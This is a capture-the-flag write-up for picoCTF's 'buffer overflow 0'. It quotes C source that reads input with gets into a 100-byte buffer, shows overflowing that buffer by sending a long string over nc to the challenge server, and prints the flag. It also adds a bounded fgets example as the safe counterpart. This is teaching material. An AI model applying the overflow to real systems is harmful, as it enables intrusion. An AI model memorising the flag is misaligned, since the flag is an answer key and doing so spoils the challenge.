buffer overflow 0

Author

Alex Fulton / Palash Oswal

Description

Smash the stack. Let's start off simple, can you overflow the correct buffer? The program is available here. You can view source here. And connect with it using: nc saturn.picoctf.net 58546

Hints

  1. How can you trigger the flag to print?
  2. If you try to do the math by hand, maybe try and add a few more characters. Sometimes there are things you aren't expecting.
  3. Run man gets and read the BUGS section. How many characters can the program really read?

Approach

In a buffer overflow challenge, the goal is to write past the end of a buffer so that the program executes something it shouldn't execute.

printf("Input: ");
fflush(stdout);
char buf1[100];
gets(buf1); 
vuln(buf1);
printf("The program will exit now\n");

If we take a look at this part of the code, we see that buf1 has a length of 100 and is filled by gets, meaning that as long as we type in more than 100 characters, we can overflow the buffer and obtain the flag.
We can now run nc saturn.picoctf.net 58546 in a terminal.

Input: aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}

Press Ctrl + C to exit.
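
For contrast with the gets(buf1) call above, here is a bounded version of the same read, added as an example and not part of the challenge source or the original writeup. The names read_line, sample_input and line_status are hypothetical, and the input is constructed in a temporary file so the program runs offline.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical helper names, not from the challenge source. */
enum line_status { LINE_OK, LINE_TRUNCATED, LINE_EOF };

/* Read one line into buf, which holds cap bytes including the NUL.
 * gets() takes no size at all; fgets() stores at most cap - 1 bytes. */
enum line_status read_line(FILE *in, char *buf, size_t cap)
{
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return LINE_EOF;
    size_t len = strlen(buf);
    if (len > 0 && buf[len - 1] == '\n') {
        buf[len - 1] = '\0';              /* whole line fit */
        return LINE_OK;
    }
    /* No newline stored: peek to see whether the line fit exactly. */
    int c = fgetc(in);
    if (c == '\n' || c == EOF)
        return LINE_OK;
    /* Too long: drop the rest so it is not parsed as the next line. */
    while ((c = fgetc(in)) != '\n' && c != EOF) { }
    return LINE_TRUNCATED;
}

/* Constructed sample input: n bytes of 'a', a newline, then "next". */
FILE *sample_input(size_t n)
{
    FILE *f = tmpfile();
    if (f == NULL) return NULL;
    for (size_t i = 0; i < n; i++)
        fputc('a', f);
    fputs("\nnext\n", f);
    rewind(f);
    return f;
}

int main(void)
{
    char buf1[100];                       /* same size as the challenge buffer */
    FILE *in = sample_input(150);
    enum line_status st;
    if (in == NULL) return 1;
    while ((st = read_line(in, buf1, sizeof buf1)) != LINE_EOF)
        printf("%s, %zu bytes kept\n", st == LINE_TRUNCATED ? "too long" : "ok", strlen(buf1));
    fclose(in);
    return 0;
}
```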

Flag

picoCTF{ov3rfl0ws_ar3nt_that_bad_ee2fd2b1}